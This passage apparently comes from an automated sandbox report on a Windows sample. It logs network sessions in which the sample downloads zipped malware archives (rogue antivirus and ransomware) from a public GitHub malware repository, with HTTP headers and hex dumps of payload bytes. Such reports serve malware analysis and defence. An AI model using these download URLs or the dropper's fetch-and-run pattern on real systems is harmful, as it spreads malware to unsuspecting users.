                                                                                                                                                            2022-09-29 12:45:04 UTC11614INData Raw: 66 7c fa 11 b2 59 2d 19 54 f1 ea c8 23 df fe 18 1d 6d 97 6d 8a b3 e8 3b ad 5b c6 89 6d ec 1f ba 04 7d ce a2 98 0c dd 85 d4 3e 1c cf 51 5c a6 ce 36 a8 0a bc 88 64 2c 9b cd 58 6e ae c7 6d a4 87 20 6e f4 5f f6 6e 09 8d 91 80 72 2f 3d d6 64 05 1e e3 fc bd 84 5e f0 fb a9 1d 73 6d 15 22 df 70 87 98 dc c6 f6 ae 21 19 ce 00 f4 53 2d 6e 35 7a ab 2a e0 85 30 4b f2 f2 52 4c 0c 31 5c fc b4 cb 7e a1 55 85 bd 90 d0 d3 9e 10 25 2f 33 6e 0b 6e 62 e4 f8 7f a4 0b 38 1b 8d 7e 0d 13 1f b1 e1 a9 45 39 a7 31 bf d6 5d 5a 15 61 b3 11 7b 5c e8 75 80 71 04 d8 d6 b5 50 c7 3a 68 4c 66 99 a8 30 75 64 e2 6e ed 48 41 a0 83 93 8b 2d d2 ae e5 9c a5 91 73 cb 3e 63 b1 dc 28 71 86 d6 35 2c 26 36 6f 93 d6 d5 b0 6f f6 f2 2f fb 19 e6 b1 a6 b4 19 3f bd 70 b0 e6 93 0f e5 62 64 8f 43 d8 aa 87 19
                                                                                                                                                            Data Ascii: f|Y-T#mm;[m}>Q\6d,Xnm n_nr/=d^sm"p!S-n5z*0KRL1\~U%/3nnb8~E91]Za{\uqP:hLf0udnHA-s>c(q5,&6oo/?pbdC
                                                                                                                                                            2022-09-29 12:45:04 UTC11630INData Raw: 1e a5 c6 7f 5e 5b 51 3c 8f 3b cc 9b fd 67 6d 64 e4 c6 22 d1 91 00 43 75 71 76 a8 67 d9 d7 b1 5d b0 f7 4a f5 bd 16 7e df 77 b0 b7 78 4c e9 ba 9c 25 cc e5 fd 10 8e b6 cd 23 9a a0 f8 2e 63 e0 ba da 2d 71 57 50 f5 9e e5 b5 83 ab 19 47 01 58 7c 50 8e ce 3c ec 1c 15 8f be 42 f7 1d a8 5d 4e b8 7b 08 7b 1c 6c 7d 31 42 ff 56 39 dd 3b bc e4 ae 73 bb 89 ec ba bd 9b 91 d7 33 4a 96 bd 5b d0 b5 81 46 99 fd fc d5 71 43 7b 3a 5a a1 1c c0 71 ef 02 31 66 c1 6b f9 37 96 50 a7 66 d1 9d 51 9f ec 87 4d e7 81 f7 30 7d 19 23 bf 36 5e 25 9a f2 0a ea 9a 2f 14 ae 8d 2b 77 4f 60 a8 5f db e8 3d 59 f7 53 8e ff de be 37 05 ed a6 d0 a1 f4 b6 c0 b4 6e d2 25 63 e1 be e9 df 32 d0 26 38 38 d8 6d 4d 6e f3 38 30 c8 f2 11 33 84 3d 4d ae c9 21 a9 9d a2 25 a7 b4 58 9d 5f 2c 8a ba 43 ee 99 39 34
                                                                                                                                                            Data Ascii: ^[Q<;gmd"Cuqvg]J~wxL%#.c-qWPGX|P<B]N{{l}1BV9;s3J[FqC{:Zq1fk7PfQM0}#6^%/+wO`_=YS7n%c2&88mMn803=M!%X_,C94


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            74192.168.2.649745140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:04 UTC11636OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            75140.82.121.4443192.168.2.649745C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:05 UTC11636INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:05 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:05 UTC11637INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            76192.168.2.649746185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:05 UTC11638OUTGET /Endermanch/MalwareDatabase/master/rogues/FakeAdwCleaner.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            77185.199.110.133443192.168.2.649746C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:05 UTC11638INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 179477
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            ETag: "38494344cdf51b86edbe1f76bf6911f46b9347e73d9f681d6b5db320a0b3f14c"
                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                            X-GitHub-Request-Id: 0807:AB6C:283C1A:2CD1B7:63359351
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:45:05 GMT
                                                                                                                                                            Via: 1.1 varnish
                                                                                                                                                            X-Served-By: cache-mxp6933-MXP
                                                                                                                                                            X-Cache: MISS
                                                                                                                                                            X-Cache-Hits: 0
                                                                                                                                                            X-Timer: S1664455505.137592,VS0,VE226
                                                                                                                                                            Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Fastly-Request-ID: f3d759b39c70322ba2c36a4202b83adc1e87af70
                                                                                                                                                            Expires: Thu, 29 Sep 2022 12:50:05 GMT
                                                                                                                                                            Source-Age: 0
                                                                                                                                                            2022-09-29 12:45:05 UTC11639INData Raw: 50 4b 03 04 14 00 01 00 08 00 86 96 4d 46 d7 12 44 12 55 bc 02 00 48 fb 02 00 1d 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 46 61 6b 65 41 64 77 43 6c 65 61 6e 65 72 2e 65 78 65 8e 63 4d 32 e6 4e f1 06 d8 1d 2c 5b 55 6f 80 61 1d 89 c5 b9 23 17 4d c1 5d 39 28 9a 83 78 47 ee 2b b5 07 8d 3b d4 30 bd 6f 54 91 12 19 11 4c a9 f2 16 dd bf 38 2c 19 f9 23 af 82 53 4b f1 f8 80 6e f2 b4 22 67 da 4e 10 9b 5b 94 a7 03 15 5b 09 c4 b3 c7 d1 e4 ed 99 13 12 6c 94 b1 03 46 99 d6 66 20 52 49 0c 59 e7 3b 2e b9 b9 0e bc 4c 3e d8 15 6f 62 84 e0 96 7f 00 cc 6b 3d 98 16 92 50 73 fa 6d b9 60 24 13 1e 11 97 fa 5d 35 5a 94 46 f2 53 dc 7f b9 2e 13 e0 5c e7 b5 66 43 0a 6b f2 de 9c b6 63 70 8f 94 7b 83 60 80 8e ea b5 75 ea cb f9 d1 3a d9 23 6a 17 21 e8 64 dc 6d c2 46 56 04 a8 ad ca f4
                                                                                                                                                            Data Ascii: PKMFDUHEndermanch@FakeAdwCleaner.execM2N,[Uoa#M]9(xG+;0oTL8,#SKn"gN[[lFf RIY;.L>obk=Psm`$]5ZFS.\fCkcp{`u:#j!dmFV
                                                                                                                                                            2022-09-29 12:45:05 UTC11655INData Raw: 81 b5 56 d8 59 1b 5c a4 e6 d2 90 c6 e7 4f ab 39 97 67 fa 75 2a c3 1d 18 b3 2e ac 37 5c 21 94 7c 69 18 36 2e e0 4e db 92 0c d9 b1 ca 08 c7 38 8e 81 ec 64 b0 ed 48 54 2f 70 aa e9 6e 8b b7 e3 b0 ca 7e 67 31 fe 01 8b a3 e1 0e 63 b1 42 e4 a8 b1 a0 0d 04 e6 fb 5d 09 88 64 90 fe 0c 8a 80 af a1 4e 8b 5e ea ad ac de a9 b0 f9 b7 38 96 14 82 7c ec e6 9c 78 9c df b8 2c 1a 8c 7e 01 7e 2b 63 37 10 81 43 a0 f0 89 85 70 6c 16 8d ae de d0 ec 99 c4 ef ca 32 80 81 5a 1c fc 6b 75 cf f9 7e 4c 3c fd 54 ab 86 d8 c2 23 89 e4 08 c7 a6 de f7 72 74 1d b5 79 da 2e ca 2e f5 6b 65 c3 21 0a 83 87 00 df 52 20 da 04 a5 d5 35 39 6a f4 b7 d4 1f 04 a1 67 b2 e3 af 22 7a 9a b0 84 b4 00 e9 b2 31 0b b0 70 e8 59 0c 23 0f 48 5d db 81 1c e4 e9 a0 cb 97 6a c2 b4 e1 ea d4 02 8b 16 a5 34 38 cc a9 6e
                                                                                                                                                            Data Ascii: VY\O9gu*.7\!|i6.N8dHT/pn~g1cB]dN^8|x,~~+c7Cpl2Zku~L<T#rty..ke!R 59jg"z1pY#H]j48n
                                                                                                                                                            2022-09-29 12:45:05 UTC11671INData Raw: ab a8 2b 49 77 fe 93 07 87 6b fa 0d 8a 5d f3 a6 39 d3 20 94 9c 2d d8 19 c5 15 70 84 0a dd 31 9b 84 1c d0 e4 ce 2c 99 9b 60 54 ab 32 59 a9 01 44 e5 e4 3d 5d c9 ab ff 81 9b 10 1b b9 e1 27 2e 58 6e 6d c4 a0 41 ea 13 86 85 ce e2 a9 e0 d4 23 32 e7 a3 b2 95 ca 50 5e 27 f8 1e bc da c9 f4 9d 05 ed af 46 66 b5 49 0f 54 fe 4d 7f 38 2b 89 a1 1b 22 7c 19 40 8e a5 33 db 1d 95 07 b2 e9 ff 4d b7 15 ca f9 24 19 e4 ff 4c d8 13 cd 1f 10 71 5c c6 63 95 b6 10 da 61 2b 6a 15 ce 28 de 9a 12 4a ba 15 81 d8 60 5c ca dc 54 1e 3a a9 b6 a1 b1 ec 5b e0 64 db db 36 67 d6 b2 52 2b 9c f0 e1 df 0b 48 a8 c4 5e 5f a3 83 7b a8 e3 99 65 65 6a fb fe 1b 38 ea 17 88 19 15 f3 b4 d3 a7 f2 1f 3d 91 26 51 8f fc 68 3f 43 31 c8 63 a0 f5 bf ae d3 3a c3 66 06 56 c2 69 0f 71 00 5d be 68 48 bf 46 3c bd
                                                                                                                                                            Data Ascii: +Iwk]9 -p1,`T2YD=]'.XnmA#2P^'FfITM8+"|@3M$Lq\ca+j(J`\T:[d6gR+H^_{eej8=&Qh?C1c:fViq]hHF<
                                                                                                                                                            2022-09-29 12:45:05 UTC11687INData Raw: 5c 3f 01 47 71 77 0f 35 7e 81 1e c0 0f 00 a0 e0 e7 54 70 a5 21 5e 05 aa ce cf 4c cf 10 8e ef 76 62 df 1a af 58 fc 21 d2 95 68 75 b0 51 ff db 7e 39 be 81 62 cd 09 50 d7 41 ce 10 be cf 5e 2d ca 1c 03 96 49 37 70 35 b4 29 ab 25 59 29 4b df 1a de b0 a4 94 e6 c1 0e c7 72 b0 0a ea e2 e2 e3 b3 5c 03 19 80 cc 05 71 7f 1c 2d 82 49 48 32 10 c0 8c 35 30 92 fe f2 92 5a 0e a6 03 90 85 ce 39 7b ab f7 ff e3 5c b5 b1 6e 4c ae 2d 87 a6 80 3a 7a c3 14 59 52 92 a5 95 5f a1 17 2e 51 32 9b e5 76 a7 9f fd 56 d4 88 3f cb 10 6c da 96 83 bc 4b 83 6e 43 52 2a f5 7c 20 a5 2b e6 e5 d5 8e 5b 2c 4e 08 3c 04 32 95 6d 5c 39 8a ee b8 af c7 db 44 b3 d2 bd 14 af 42 16 cc f3 2b 03 07 a4 48 9f 6e 94 b2 f7 ce e4 69 49 eb b3 cb 0e c6 e3 67 1e 56 66 12 9f ad 27 47 b9 a2 4b da 64 04 cb 3b 4d 25
                                                                                                                                                            Data Ascii: \?Gqw5~Tp!^LvbX!huQ~9bPA^-I7p5)%Y)Kr\q-IH250Z9{\nL-:zYR_.Q2vV?lKnCR*| +[,N<2m\9DB+HniIgVf'GKd;M%
                                                                                                                                                            2022-09-29 12:45:05 UTC11703INData Raw: 9b 61 6d 6d fc 79 8b 6a 69 e9 3e 98 42 53 ae 9a 31 ca 0b dd f5 47 3f 86 7d 4f 0a 7a 91 b9 f5 e5 7b e5 98 2d f5 5b 41 94 73 7f 0e 24 60 cd 6b b7 3b c9 17 f8 ca 4b a6 24 3a 51 34 eb 3d c3 8c 41 c6 0b 8a f7 b1 29 6e 50 a1 ea 4d 82 fd 71 15 5f bf 15 e4 45 3c 37 9e f6 d1 a7 f5 a0 99 23 a2 6f 19 6e 63 6c 8b 26 1f 78 39 29 a7 d0 7b eb d8 ec ac e5 84 1c f8 41 0b ee e3 d2 5f fd 74 8e dc 2f e0 35 1d 64 db 2e 30 1e 3d 7d 9d a9 e9 f1 e3 c0 24 a5 b7 53 cf 9b 35 75 61 d6 d8 0d 94 fa 53 20 97 58 48 d7 ad 07 20 c2 cc 19 c4 89 2c f7 d9 59 33 ac 74 18 8d e0 3c e4 51 58 2c 11 98 ee 31 38 6f f3 9d e5 00 3f 11 83 83 4d 93 79 40 93 2e c6 44 c3 10 c3 a8 7e fb 9b b5 96 28 59 65 8e ee ca 84 c1 ea fd 9d c4 a1 f2 ce af 56 a5 46 96 cd 3e 1b e0 d4 bc 86 77 cd 0d 45 88 bf bc 52 51 83
                                                                                                                                                            Data Ascii: ammyji>BS1G?}Oz{-[As$`k;K$:Q4=A)nPMq_E<7#oncl&x9){A_t/5d.0=}$S5uaS XH ,Y3t<QX,18o?My@.D~(YeVF>wERQ
                                                                                                                                                            2022-09-29 12:45:05 UTC11719INData Raw: 5f 8b 72 e8 a4 ff 00 60 b0 d6 3b 81 0d d3 b4 97 8b a5 6d 55 94 ef 0f 87 4d ab 78 35 cb db 0f c4 f3 49 42 9a bf 7c 34 55 1b f2 39 e6 05 e2 37 cf ce 4b fd b0 20 7d df 88 3b ed cf fe 65 00 75 94 61 88 fc e8 a2 9d 43 41 24 78 bb a7 c3 8e 4d 2e 2b 49 f1 25 59 8d e5 c9 3a 31 20 ec 9b 0f 4b ef c8 fe de 0c f6 3c c8 49 12 ca a5 cb 93 50 b6 9d 83 db 95 cd 09 e0 e0 44 31 2c 98 15 93 3f af bd ae f4 d2 b5 7b d6 11 58 f4 6b 33 2c 55 e0 de 3b 69 ab 3b 8f 84 9a 0c 4c 24 3f 97 d4 fa 4a d5 92 4b e6 d7 9b 1f 63 77 a0 aa 5d b0 a8 02 ec a1 3f 61 2b 50 e0 40 4f b1 f2 4e 9e e9 f7 f3 72 80 45 22 55 1d 2d eb 0e e6 58 a2 42 a5 61 a3 f6 6b e1 7c 6f a3 7c 81 0b a7 04 0f 0a 2d 3b 8c ed ac f4 eb a5 6f f5 1f 44 92 4a e0 5c ae f3 f5 b6 98 6a 04 b6 10 30 6c c8 21 72 92 65 e8 3a 26 ec 84
                                                                                                                                                            Data Ascii: _r`;mUMx5IB|4U97K };euaCA$xM.+I%Y:1 K<IPD1,?{Xk3,U;i;L$?JKcw]?a+P@ONrE"U-XBak|o|-;oDJ\j0l!re:&
                                                                                                                                                            2022-09-29 12:45:05 UTC11735INData Raw: 5e 86 9c 78 b5 dc 50 b5 ba 02 68 6d b8 83 c0 20 aa 9a 64 c2 97 54 2c 97 59 92 aa 49 74 6b 1a d8 07 dd a3 79 49 ac 7c 72 d5 70 d3 a1 ee f9 6e 93 45 63 35 a6 39 bf cc 17 6b 26 89 78 e8 0c f1 b6 56 71 b6 4d cf 5b 92 ca 74 af 41 dc e0 7d f4 e6 17 ab 55 1b 68 0f 86 ac 4b aa 3c 34 ff 1f 45 36 28 04 77 7e a1 ea 38 28 20 d8 59 b2 de f2 c0 62 8c dd 51 67 92 a6 9a 96 60 d3 86 87 71 35 99 dc ea 91 09 e1 bc 7a a2 c6 21 d4 1f 9c e2 eb 33 43 ea 8c e1 63 5e 30 49 7e 19 bb de ee 5a d4 dc d4 ab 73 e0 08 e7 ac a0 17 9a bc c4 82 b5 70 de 60 93 d2 9f 1e a6 00 02 d6 8a 74 48 f6 ad f1 7a a0 9b 01 46 57 07 62 00 46 3d cd ec 71 fa d4 43 4d b5 f7 be 86 bb 6b f8 09 a5 af a3 97 eb 1f 1b be 10 52 02 83 17 79 20 39 1d 18 43 b5 e7 35 ab 55 7a 32 ad 6e 4b df f2 35 ef f0 b5 79 64 0d e4
                                                                                                                                                            Data Ascii: ^xPhm dT,YItkyI|rpnEc59k&xVqM[tA}UhK<4E6(w~8( YbQg`q5z!3Cc^0I~Zsp`tHzFWbF=qCMkRy 9C5Uz2nK5yd
                                                                                                                                                            2022-09-29 12:45:05 UTC11751INData Raw: f1 9b a0 5b 96 4e ff 66 71 05 a4 be af fa 01 80 08 03 23 24 5f 2b c4 2a 47 fd f6 01 c8 06 2c fd 51 e1 b5 c5 e3 09 18 0f 09 6a 85 e5 36 70 62 a0 c8 b7 9d 33 30 e0 fe 7a 9f a0 50 2d aa 70 f1 50 b0 f9 5e 8f 1a 31 85 25 df 6a 3d ac dc af 14 b8 f5 98 aa bc e3 bf da 5a 35 5e 3e 38 d4 ec 12 79 0b 78 d7 e4 92 58 49 ee 24 c1 22 95 d4 ef 45 f4 36 2e 72 0c c2 49 39 09 23 a6 fc c7 ed 5d 37 f8 c2 27 d8 ab 25 28 63 70 8d 5c ea 83 4e c6 40 f5 c6 46 bb 67 26 e1 11 23 55 58 a8 79 a1 50 44 59 e0 2e 12 98 4d c2 8d e2 0a 11 f4 7f 4e f0 f5 cd 63 71 52 e0 19 c7 21 14 00 62 81 9c 03 1f e4 88 21 28 c8 76 10 d8 af 79 5f 11 65 40 29 61 69 54 17 62 0e af c3 4d f0 d8 31 1b 51 58 cf f8 bf 70 ba cf d9 24 7d 69 72 2f 05 f5 f6 03 6f 03 28 d8 4f 72 56 d1 d7 5d 08 2c 1b 49 f2 45 16 2e 4e
                                                                                                                                                            Data Ascii: [Nfq#$_+*G,Qj6pb30zP-pP^1%j=Z5^>8yxXI$"E6.rI9#]7'%(cp\N@Fg&#UXyPDY.MNcqR!b!(vy_e@)aiTbM1QXp$}ir/o(OrV],IE.N
                                                                                                                                                            2022-09-29 12:45:05 UTC11767INData Raw: 10 12 91 79 d0 04 5f 76 57 50 77 bb 51 b1 6d 12 0b f9 7f ff d1 3b b6 79 0c 4c d8 79 67 04 79 81 a0 f4 a3 ea a7 40 4c dc fd ae 2b db 3f 4e ee a3 0c ba f8 0d c8 60 6e da 93 1c 1d 09 0b 4f 0e f0 32 dd d2 23 97 43 bc da b4 ab 82 9d 28 59 55 f6 05 43 19 e3 79 f3 19 57 bd 3f 01 fe 67 3f c4 04 d9 a3 8e a2 44 9c 45 49 b0 00 cc a5 57 6f ad 9e a9 8e ff 1c 45 cc a6 d4 a6 fc 6d ec a3 2d fb a7 b1 5b bf 57 cb 18 d2 35 ad 6b 4f be ff 38 8e 4b 8a 29 a0 10 9b d8 2e a2 e9 c6 9a 41 1d 56 89 d6 b3 12 a3 13 22 5d 81 6f 9b 43 00 73 5b 14 20 7d 2e e4 92 53 85 02 d8 24 d0 ca 87 f1 ef f2 1a b0 25 aa ad 46 3f 6d 2b bf 10 24 6a aa 32 78 e7 45 f9 85 b8 21 dc 1c 41 19 c7 a6 b8 5d c0 01 8e 30 c8 fd 88 9e 47 fb ce 29 a7 e5 27 46 c5 80 96 7a 4d cb 10 d7 4a 4b cd 39 b8 0a fb 50 2e ea 86
                                                                                                                                                            Data Ascii: y_vWPwQm;yLygy@L+?N`nO2#C(YUCyW?g?DEIWoEm-[W5kO8K).AV"]oCs[ }.S$%F?m+$j2xE!A]0G)'FzMJK9P.
                                                                                                                                                            2022-09-29 12:45:05 UTC11783INData Raw: 69 17 b7 1c 49 c1 de f1 70 ff 84 cb fa 0f 91 64 d6 97 1b 2a 6a 50 01 31 3f 26 e5 ea 65 0f e1 69 9b a8 21 47 98 d8 f4 f2 2b d1 9c 7b 36 01 55 cc 1c a8 a5 ba 3e 50 5d 47 38 1d 47 d3 f9 40 af 28 9b 35 9c 81 7a 4a f0 a6 f9 e2 09 26 af ad 2b 7e 66 da 97 d1 54 bc 47 be e3 7b a4 32 d9 10 90 aa 26 bd d0 e6 e6 40 9f 7c 9f 68 af e1 dc 88 d1 f0 67 50 26 cb 17 fe af 38 76 d2 c5 95 97 0d ae 78 88 70 f0 41 52 72 3b ca 49 f0 e1 4c af 5e f4 e2 cb 77 6e d2 18 3e 12 d3 bd 4f e4 8c 72 83 8a 12 e5 00 82 49 2c 24 83 6c a6 2f 90 98 fe 2f bb 90 7e 1d 20 16 31 0c 6f 5c c4 21 83 9d b3 4c a8 cc 2c 7e e9 73 80 fc 8d ce 1d 35 d3 7e 86 6e 7d b8 83 3a 97 c5 f1 19 01 c7 86 18 ea 18 4d ad ce 80 59 e8 1c 22 77 c9 0d 7b e5 d1 b8 98 9c 37 e9 34 d3 44 a9 e5 8e 93 c8 c9 a8 2a 34 4e 46 5b 2d
                                                                                                                                                            Data Ascii: iIpd*jP1?&ei!G+{6U>P]G8G@(5zJ&+~fTG{2&@|hgP&8vxpARr;IL^wn>OrI,$l//~ 1o\!L,~s5~n}:MY"w{74D*4NF[-
                                                                                                                                                            2022-09-29 12:45:05 UTC11799INData Raw: 47 c9 4c f8 85 c4 6c b0 f4 24 66 02 72 c8 c0 03 6e 50 30 77 78 e9 91 8d 4b f9 3b cf f9 e1 97 cc b2 ae 5d b5 f4 92 b4 5a 11 99 97 e4 1e bc 45 8d 3b 52 59 28 ad c5 51 7b d4 7c df 81 50 41 e6 88 3a 8f b6 51 1a a2 4f 91 b6 da 6d dd c5 ba d5 a0 d5 f6 29 92 f1 9e 2f 67 c8 50 d0 2b 2b b5 d3 fc 7d 4d a8 8f a2 3b de 48 dd 09 86 aa 5e 75 01 2b 3d 39 fe c4 ee c4 16 f2 82 ca 19 90 f3 44 89 66 46 7a 31 3f 84 09 28 a8 41 50 f8 b0 b0 6b 3d c5 43 ab 92 3f fe 7e 5b df 1b 1b 08 68 21 89 8d 03 e4 a3 23 5f 61 76 50 17 9f 4f 11 df fa 02 0b b2 f0 ba e5 c1 1f 86 84 67 b6 19 35 dd 06 64 34 55 7d ed 2d 76 82 8b 4d 78 54 d7 27 ab e2 26 9e c4 c9 da 07 27 9a 84 21 05 75 8d b2 09 26 36 2a 61 23 53 87 29 da 0b c0 3a e2 df 3d 14 49 fc 2b 9d 47 b4 47 49 88 58 a3 1a 1b 3c 51 ff ec 98 6d
                                                                                                                                                            Data Ascii: GLl$frnP0wxK;]ZE;RY(Q{|PA:QOm)/gP++}M;H^u+=9DfFz1?(APk=C?~[h!#_avPOg5d4U}-vMxT'&'!u&6*a#S):=I+GGIX<Qm


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            78192.168.2.649747140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:05 UTC11815OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            79140.82.121.4443192.168.2.649747C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:05 UTC11815INHTTP/1.1 302 Found
                                                                                                                                                            Server: GitHub.com
                                                                                                                                                            Date: Thu, 29 Sep 2022 12:44:30 GMT
                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                            Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                            Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                            Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                            X-Frame-Options: deny
                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                            Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                            2022-09-29 12:45:05 UTC11815INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                            Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            8192.168.2.649712185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:46 UTC400OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Birele.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            80192.168.2.649748185.199.110.133443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:05 UTC11817OUTGET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1
                                                                                                                                                            Host: raw.githubusercontent.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            81185.199.110.133443192.168.2.649748C:\Users\user\Desktop\bpkAAJptGv.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:05 UTC11817INHTTP/1.1 200 OK
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Length: 1721302
                                                                                                                                                            Cache-Control: max-age=300
                                                                                                                                                            Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                            Content-Type: application/zip
